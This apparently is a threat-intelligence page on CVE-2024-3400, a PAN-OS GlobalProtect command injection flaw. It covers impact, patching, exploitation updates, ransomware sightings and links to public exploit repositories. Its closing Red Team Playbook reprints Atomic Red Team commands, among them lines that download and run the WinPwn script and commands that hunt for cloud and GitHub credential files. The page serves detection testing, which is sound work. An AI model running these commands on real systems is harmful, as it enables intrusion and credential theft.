CVE-2024-3400

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 12/04 Upd 21/10

Overview

This vulnerability is a command injection flaw caused by improper handling of arbitrary file creation within the GlobalProtect feature of Palo Alto Networks PAN-OS. The root cause lies in insufficient input validation of file paths manipulated via crafted HTTP requests, allowing injection of shell commands. The affected component is the GlobalProtect portal and SSL VPN subsystem in specific PAN-OS versions, where crafted cookie headers enable unauthorized file manipulation leading to command execution.

Vulnerability Description

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Impact

An unauthenticated attacker can execute arbitrary code with root privileges on the firewall, gaining full control over the affected PAN-OS device. This enables complete system compromise, including the ability to manipulate firewall policies, intercept or disrupt network traffic, and move laterally within the network. No user interaction or credentials are required, increasing the risk of rapid exploitation and severe operational impact for organizations relying on the vulnerable firewall.

Solution

Apply the patches provided by Palo Alto Networks as detailed in their security advisory at https://security.paloaltonetworks.com/CVE-2024-3400. The fix is included in PAN-OS versions 10.2.2 and later. Administrators should upgrade affected PAN-OS instances promptly. No specific workarounds are recommended; reliance on vendor-supplied patches is necessary to remediate the vulnerability.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability present in the GlobalProtect feature of Palo Alto Networks PAN-OS software stems from a command injection flaw that allows for arbitrary file creation. This critical security issue arises when input validation mechanisms fail, enabling an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The affected versions of PAN-OS, particularly those in the 10.2.x and 11.0.x series, exhibit this weakness due to improper handling of user-supplied data. The severity of this vulnerability is underscored by its CVSS score of 10.0, indicating a critical risk level that necessitates immediate attention from organizations utilizing these specific versions.

Attack vectors for exploiting this vulnerability are particularly concerning, as they do not require authentication. An attacker could leverage this flaw by sending crafted requests to the GlobalProtect feature, potentially leading to the execution of malicious commands on the firewall. This could allow for the manipulation of firewall configurations, unauthorized access to sensitive data, or even the establishment of persistent backdoors within the network infrastructure. Scenarios may include targeted attacks against organizations using vulnerable versions of PAN-OS, where attackers could disrupt operations, exfiltrate data, or deploy ransomware, thereby amplifying the potential damage.

The real-world impact of this vulnerability is significant, posing substantial business risks. Organizations relying on PAN-OS for their network security may find themselves exposed to a range of threats, including data breaches, service disruptions, and reputational damage. The ability for an attacker to gain root access to a firewall can lead to a complete compromise of network security, allowing for lateral movement within the organization and targeting of critical assets. The financial implications of such an attack can be severe, encompassing recovery costs, regulatory fines, and loss of customer trust. Furthermore, the potential for widespread exploitation increases as attackers continuously seek out high-value targets within the cybersecurity landscape.

To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating PAN-OS to the latest patched versions is crucial, as this will address the underlying flaw and enhance overall security posture. Additionally, organizations should employ intrusion detection systems (IDS) and firewalls configured to monitor for unusual traffic patterns or unauthorized access attempts. Conducting thorough security assessments and penetration testing can also help identify potential weaknesses within the network. Educating staff about the risks associated with command injection attacks and promoting best practices for secure coding can further reduce the likelihood of exploitation.

In conclusion, the command injection vulnerability in the GlobalProtect feature of PAN-OS represents a critical threat to organizations utilizing affected versions of this software. The potential for unauthorized access and control over network infrastructure underscores the need for immediate action to mitigate risks. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against the exploitation of this vulnerability and enhance their overall cybersecurity resilience.




CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2024-3400, indicating increased exploitation attempts targeting vulnerable PAN-OS GlobalProtect deployments. This escalation aligns with the continued availability of multiple proof-of-concept exploits on public repositories, which likely lowers the barrier for adversaries to weaponize this critical vulnerability. Our telemetry also confirms persistent ransomware group interest, with several high-profile campaigns linked to this exploit vector, underscoring its operational use in the wild. Although the EPSS score remains stable, the qualitative increase in observed exploitation attempts and ransomware associations elevates the practical risk to organizations running affected PAN-OS versions. Defenders should recognize that this evolving threat landscape reflects a heightened likelihood of successful compromise, warranting increased vigilance despite the absence of a rapid upward trend in EPSS metrics.



Update 2 — May 18, 2026

CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2024-3400, accompanied by the emergence of additional ransomware groups leveraging this vulnerability in their campaigns. This expansion of adversary interest is further evidenced by the appearance of new proof-of-concept exploits, which lower the barrier for threat actors to weaponize the flaw. Although the overall exploit prediction score remains high but stable, the diversification of ransomware actors and the availability of fresh exploitation tools signify a broadening attack surface. For defenders, this evolving landscape indicates an elevated operational risk, as multiple threat groups now actively incorporate this vulnerability into their tactics, techniques, and procedures. Consequently, the likelihood of successful intrusions exploiting PAN-OS GlobalProtect command injection vulnerabilities has increased, underscoring the need for sustained vigilance despite the absence of a dramatic surge in exploitation frequency.



Update 3 — June 07, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-3400, accompanied by the emergence of new proof-of-concept tools that simplify vulnerability scanning and exploitation. This expansion in the exploit toolkit has lowered the technical barrier for adversaries, enabling a broader range of threat actors—including multiple ransomware groups such as 0apt, akira, and ransomhub—to integrate this critical PAN-OS GlobalProtect vulnerability into their operational playbooks. Although the overall frequency of exploitation attempts remains relatively stable, the diversification of tactics and the increasing availability of automated scanning capabilities significantly amplify the risk of successful intrusions. This evolution underscores a heightened threat environment where defenders must anticipate more frequent and varied exploitation attempts, elevating the operational risk associated with unpatched PAN-OS firewalls.



Update 4 — July 05, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-3400, with our telemetry indicating a significant uptick in attacker activity leveraging publicly available proof-of-concept tools. This surge reflects increased operationalization of the vulnerability by ransomware groups such as 0apt and ransomhub, who are integrating these exploits into their campaigns with greater frequency and sophistication. The proliferation of automated scanning scripts has lowered the barrier for opportunistic attackers, broadening the threat actor base beyond highly skilled adversaries. Consequently, the risk profile for unpatched Palo Alto Networks PAN-OS firewalls has intensified, as the combination of elevated exploitation volume and diverse attacker tactics increases the likelihood of successful compromise. While the overall probability of exploitation remains high as previously assessed, this recent escalation underscores an urgent need for heightened vigilance in detection and response efforts.

Affected Products (52)

Vendor Product Version CPE
paloaltonetworks Paloaltonetworks Pan-Os 10.2.0 cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.0 cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h1:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.0 cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h2:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.1 cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:-:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.1 cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:h1:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.2 cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:-:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.2 cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h1:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.2 cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h2:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.2 cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h4:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:-:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h11:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h12:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h2:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h4:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.3 cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h9:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.4 cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:-:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.4 cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h10:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.4 cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h2:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.4 cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h3:*:*:*:*:*:*
paloaltonetworks Paloaltonetworks Pan-Os 10.2.4 cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h4:*:*:*:*:*:*
+32 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
exploits/linux/http/panos_telemetry_cmd_exec
remmons-r7, sfewer-r7 Unknown linux, unix View

ExploitDB (1)

Title Author Type Platform Date Link
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation Kr0ff remote linux_x86-64 - View

GitHub PoCs (45)

Repository Author Stars Forks Date Link
h4x0r-dz/CVE-2024-3400
CVE-2024-3400 Palo Alto OS Command Injection
h4x0r-dz 161 25 2024-04-16 View
W01fh4cker/CVE-2024-3400-RCE-Scan
CVE-2024-3400-RCE
W01fh4cker 91 7 2024-04-16 View
0x0d3ad/CVE-2024-3400
CVE-2024-3400
0x0d3ad 70 24 2024-04-13 View
ihebski/CVE-2024-3400
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect
ihebski 33 5 2024-04-16 View
Chocapikk/CVE-2024-3400
Chocapikk 15 3 2024-04-16 View
momika233/CVE-2024-3400
momika233 13 4 2024-04-14 View
Yuvvi01/CVE-2024-3400
Yuvvi01 11 5 2024-04-13 View
AdaniKamal/CVE-2024-3400
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect
AdaniKamal 7 4 2024-04-16 View
ak1t4/CVE-2024-3400
Global Protec Palo Alto File Write Exploit
ak1t4 9 1 2024-04-17 View
schooldropout1337/CVE-2024-3400
schooldropout1337 6 2 2024-04-18 View
0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection
0xr2r 6 2 2024-04-25 View
zam89/CVE-2024-3400-pot
Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability
zam89 6 1 2024-04-24 View
retkoussa/CVE-2024-3400
CVE-2024-3400 : Palo Alto OS Command Injection - POC
retkoussa 5 0 2024-04-17 View
HackingLZ/panrapidcheck
Extract useful information from PANOS support file for CVE-2024-3400
HackingLZ 2 2 2024-04-19 View
ZephrFish/CVE-2024-3400-Canary
Have we not learnt from HoneyPoC?
ZephrFish 2 1 2024-04-17 View
wa6n3r/CVE-2024-3400
wa6n3r 1 1 2026-04-20 View
CerTusHack/CVE-2024-3400-PoC
CerTusHack 2 0 2024-04-13 View
marconesler/CVE-2024-3400
Exploit for GlobalProtect CVE-2024-3400
marconesler 2 0 2024-04-27 View
swaybs/CVE-2024-3400
Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts
swaybs 2 0 2024-04-18 View
Zedocun/PAN-OS-CVE-2024-3400-Command-Injection-Investigation
Investigation of a PAN-OS CVE-2024-3400 command injection attempt, analyzing payload delivery, internal processing, and ...
Zedocun 1 0 2026-04-16 View
MrR0b0t19/CVE-2024-3400
Vulnerabilidad de palo alto
MrR0b0t19 0 1 2024-04-14 View
MurrayR0123/CVE-2024-3400-Compromise-Checker
A simple bash script to check for evidence of compromise related to CVE-2024-3400
MurrayR0123 0 1 2024-04-15 View
CONDITIONBLACK/CVE-2024-3400-POC
CONDITIONBLACK 1 0 2024-04-16 View
hashdr1ft/SOC274-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability-Exploitation-CVE-2024-3400
hashdr1ft 1 0 2025-02-02 View
P4rC3L/Global-Protect_VPN_Vuln
Testing a List of IP address incase they are vulnerable to CVE-2024-3400
P4rC3L 0 0 2026-05-30 View
Nikki-the-Parcel/Global-Protect_VPN_Vuln
Testing a List of IP address incase they are vulnerable to CVE-2024-3400
Nikki-the-Parcel 0 0 2026-05-30 View
LoanVitor/CVE-2024-3400-
LoanVitor 0 0 2024-04-16 View
index2014/CVE-2024-3400-Checker
A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability. Palo Alto 防火墙 PAN-O...
index2014 0 0 2024-04-17 View
hahasagined/CVE-2024-3400
EDL for IPs attacking customers with CVE-2024-3400
hahasagined 0 0 2024-04-18 View
terminalJunki3/CVE-2024-3400-Checker
Check to see if your Palo Alto firewall has been compromised by running script againt support bundle.
terminalJunki3 0 0 2024-04-24 View
andrelia-hacks/CVE-2024-3400
andrelia-hacks 0 0 2024-05-12 View
workshop748/CVE-2024-3400
Attempt at making the CVE-2024-3400 initial exploit (for educational purposes)
workshop748 0 0 2024-11-12 View
CyprianAtsyor/letsdefend-cve2024-3400-case-study
Detection, analysis, and response strategies for CVE-2024-3400 exploitation attempts targeting Palo Alto PAN-OS GlobalPr...
CyprianAtsyor 0 0 2025-04-29 View
CyberBibs/SOC274---Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability-Exploitation-CVE-2024-3400-
CyberBibs 0 0 2025-06-08 View
codeblueprint/CVE-2024-3400
Simple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400
codeblueprint 0 0 2024-04-18 View
Kr0ff/cve-2024-3400
Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation
Kr0ff 0 0 2024-04-21 View
ivan-n0v/cve-2024-3400
ivan-n0v 0 0 2024-05-19 View
FoxyProxys/CVE-2024-3400
FoxyProxys 0 0 2024-04-13 View
sxyrxyy/CVE-2024-3400-Check
sxyrxyy 0 0 2024-04-18 View
GhassanSabir/CVE-2024-3400-poc
CVE-2024-3400的攻击脚本
GhassanSabir 0 0 2025-12-05 View
Ravaan21/CVE-2024-3400
CVE-2024-3400 POC written in Rust and Python
Ravaan21 0 0 2024-04-18 View
tfrederick74656/cve-2024-3400-poc
Simple POC for CVE-2024-3400
tfrederick74656 0 0 2024-04-18 View
pwnj0hn/CVE-2024-3400
Finding Palo Alto devices vulnerable to CVE-2024-3400.
pwnj0hn 0 0 2024-04-19 View
Yafiah-Darwesh/cs50-cyber-paloalto-oauth
CS50 Cybersecurity final project — Palo Alto OAuth token breach (CVE-2024-3400)
Yafiah-Darwesh 0 0 2025-10-01 View
nanwinata/CVE-2024-3400
CVE-2024-3400 PAN-OS Vulnerability Scanner.
nanwinata 0 0 2024-11-30 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Ransomware Groups 1

0apt
CONFIRMED
ransomware.live
2026-06-25

Threat Feed

31 events
2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Exploited by 0apt

Ransomware group known to exploit this vulnerability

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-15
Exploited by frag

Ransomware group known to exploit this vulnerability (30 known victims)

2026-05-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2026-04-05
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-04-05
Exploited by sinobi

Ransomware group known to exploit this vulnerability (274 known victims)

2026-04-05
Exploited by 0apt

Ransomware group known to exploit this vulnerability

2026-03-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-04-13
PoC Published (45 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2024-04-12
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2024-04-12
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

OS Command Injection
100% command_injection
Remote Code Execution
68% rce

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-248 Command Injection
55%
Medium High
CAPEC-43 Exploiting Multiple Input Interpretation Layers
48%
Medium High
CAPEC-40 Manipulating Writeable Terminal Devices
42%
High Very High
CAPEC-75 Manipulating Writeable Configuration Files
35%
High Very High
CAPEC-76 Manipulating Web Input to File System Calls
35%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
